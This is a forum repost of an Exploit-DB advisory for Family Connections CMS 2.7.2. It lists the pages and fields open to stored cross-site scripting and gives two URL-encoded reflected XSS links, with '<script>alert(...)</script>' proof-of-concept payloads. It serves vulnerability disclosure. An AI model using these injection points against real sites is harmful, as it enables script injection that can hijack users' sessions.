Exploit Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
18230
Проверка EDB
  1. Пройдено
Автор
AHMED ELHADY MOHAMED
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2012-0699
Дата публикации
2011-12-10
Код: 
FCMS_2.7.2 cms and earlier multiple stored XSS Vulnerability
===================================================================================
# Exploit Title: FCMS_2.7.2 cms multiple stored XSS Vulnerability

Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.7.2/FCMS_2.7.2.zip/download

# Author: Ahmed Elhady Mohamed

# Category:: webapps

# Tested on: windows XP Sp2 En

===================================================================================



#First we must install all optional sections during installation process.

        #############################################Stored XSS################################################################


         page : messageboard.php?thread=1	

	 decription: if you ADD javascript code in " reply " field , the code will execute in " profile.php?member=1 " page.


	page : familynews.php?addnews=yes

	description : when you add news you can put js in " text area " field to execute


	page : prayers.php

	description : when you add prayer  ,you can inject js in "pray for" field as "<script>alert(/xss/)</script>"


	page : recipes.php?add=category

	description : insert in "name" field  "><script>alert(/xss/)</script> , it will execute at "recipes.php?addrecipe=yes" page

	
	page : calendar.php?add=2011-12-2

	description : when add an event, insert in "Event" field ("<script>alert(/xss/)</script>")
	
	it will execute at  "calendar.php" page

	################################Reflected XSS#################################################################################

	These pages have reflected xss .
	
	calendar.php?add=2011-12-7%22%3E%3Cscript%3Ealert%28/family/%29%3C/script%3E

	gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
 	##############################################################################################################################
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Family CMS 2.9 - Multiple Vulnerabilities
Ответы
0
Просмотры
322
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit family connections 2.2.3 - Multiple Vulnerabilities
Ответы
0
Просмотры
259
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit family connection 1.8.1 - Multiple Vulnerabilities
Ответы
0
Просмотры
257
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit family connections 2.1.3 - Multiple Vulnerabilities
Ответы
0
Просмотры
248
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Family Connections CMS 1.4 - Multiple SQL Injections
Ответы
0
Просмотры
261
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Oftpd 0.3.7 - Unsupported Address Family Remote Denial of Service
Ответы
0
Просмотры
386
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Family Connections 2.3.2 - 'subject' HTML Injection
Ответы
0
Просмотры
358
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit)
Ответы
0
Просмотры
317
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Family Connections CMS 2.5.0/2.7.1 - 'less.php' Remote Command Execution
Ответы
0
Просмотры
338
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Sethi Family Guestbook 3.1.8 - Cross-Site Scripting
Ответы
0
Просмотры
302
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу